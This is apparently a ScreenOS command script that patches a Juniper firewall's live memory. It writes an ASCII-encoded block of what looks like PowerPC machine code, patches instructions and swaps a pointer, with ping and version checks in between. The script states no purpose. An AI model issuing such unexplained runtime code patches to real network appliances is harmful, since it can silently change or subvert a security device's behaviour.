set mem addr 0x1454bfc 0x000636f0
ping
set mem addr 0x1551db4 0x4d333241
set mem addr 0x1551db8 0x4536302c
set mem addr 0x1551dbc 0x3031653a
set mem addr 0x1551dc0 0x33443230
set mem addr 0x1551dc4 0x30303334
set mem addr 0x1551dc8 0x33383630
set mem addr 0x1551dcc 0x34383030
set mem addr 0x1551dd0 0x62303639
set mem addr 0x1551dd4 0x33396234
set mem addr 0x1551dd8 0x33643230
set mem addr 0x1551ddc 0x30303566
set mem addr 0x1551de0 0x36313239
set mem addr 0x1551de4 0x64313734
set mem addr 0x1551de8 0x37643238
set mem addr 0x1551dec 0x30336136
set mem addr 0x1551df0 0x34653830
set mem addr 0x1551df4 0x30303230
set mem addr 0x1551df8 0x00000000
set mem addr 0x1454bfc 0x0032acac
get tech | in juniper
ping
set mem addr 0x636c8 0x60630300
set mem addr 0x1454bfc 0x000636f0
get tech | in juniper
ping
set mem addr 0x343184 0x48000014
set mem addr 0x1454bfc 0x005ac5c4
